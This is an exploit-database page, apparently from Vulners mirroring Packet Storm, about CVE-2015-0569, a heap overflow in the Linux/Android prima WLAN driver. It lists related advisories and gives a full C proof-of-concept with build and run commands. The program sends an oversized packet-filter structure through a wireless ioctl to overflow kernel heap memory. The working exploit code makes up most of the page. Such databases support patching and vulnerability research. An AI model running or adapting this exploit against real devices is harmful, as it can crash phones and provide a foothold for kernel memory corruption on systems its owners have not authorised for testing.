Vulners
Lucene search
Linux Kernel prima WLAN Driver Heap Overflow
🗓️ 25 Jan 2016 00:00:00Reported by Shawn the R0ckType 
packetstorm🔗 packetstormsecurity.com👁 174 Views
| Reporter | Title | Published | Views | Family All 155 |
|---|---|---|---|---|
 | Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow | 25 Jan 201600:00 | – | zdt |
 | Exploit for Out-of-bounds Write in Linux Linux_Kernel | 13 Sep 202521:03 | – | gitee |
 | CVE-2015-0569 | 1 May 201600:00 | – | android |
 | Linux kernel WLAN Driver Component Buffer Overflow Vulnerability | 22 Apr 201600:00 | – | cnvd |
 | CVE-2015-0569 | 9 May 201610:00 | – | cve |
 | CVE-2015-0569 | 9 May 201610:00 | – | cvelist |
 | EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1484) | 13 May 201900:00 | – | nessus |
 | EUVD-2015-0582 | 7 Oct 202500:30 | – | euvd |
 | In-the-Wild Series: Android Exploits | 12 Jan 202100:00 | – | googleprojectzero |
 | Security Advisory - Memory Overflow Vulnerability in the Huawei Smartphone | 24 Nov 201500:00 | – | huawei |
10
`/*
* Coder: Shawn the R0ck, [[email protected]]
* Co-worker: Pray3r, [[email protected]]
* Compile:
* # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT -pie
* # ./a.out wlan0
* Boom......shit happens[ as always];-)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/wireless.h>
#include <errno.h>
typedef unsigned char v_U8_t;
#define HDD_MAX_CMP_PER_PACKET_FILTER 5
struct PacketFilterParamsCfg {
v_U8_t protocolLayer;
v_U8_t cmpFlag;
v_U8_t dataOffset;
v_U8_t dataLength;
v_U8_t compareData[8];
v_U8_t dataMask[8];
};
typedef struct {
v_U8_t filterAction;
v_U8_t filterId;
v_U8_t numParams;
struct PacketFilterParamsCfg
paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
} tPacketFilterCfg, *tpPacketFilterCfg;
int main(int argc, const char *argv[])
{
if (argc != 2) {
fprintf(stderr, "Bad usage\n");
fprintf(stderr, "Usage: %s ifname\n", argv[0]);
return -1;
}
struct iwreq req;
strcpy(req.ifr_ifrn.ifrn_name, argv[1]);
int fd, status, i = 0;
fd = socket(AF_INET, SOCK_DGRAM, 0);
tPacketFilterCfg p_req;
/* crafting a data structure to triggering the code path */
req.u.data.pointer =
malloc(sizeof(v_U8_t) * 3 +
sizeof(struct PacketFilterParamsCfg) * 5);
p_req.filterAction = 1;
p_req.filterId = 0;
p_req.numParams = 3;
for (; i < 5; i++) {
p_req.paramsData[i].dataLength = 241;
memset(&p_req.paramsData[i].compareData, 0x41, 16);
}
memcpy(req.u.data.pointer, &p_req,
sizeof(v_U8_t) * 3 +
sizeof(struct PacketFilterParamsCfg) * 5);
if (ioctl(fd, 0x8bf7, &req) == -1) {
fprintf(stderr, "Failed ioct() get on interface %s: %s\n",
argv[1], strerror(errno));
} else {
printf("You shouldn't see this msg...\n");
}
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jan 2016 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.00446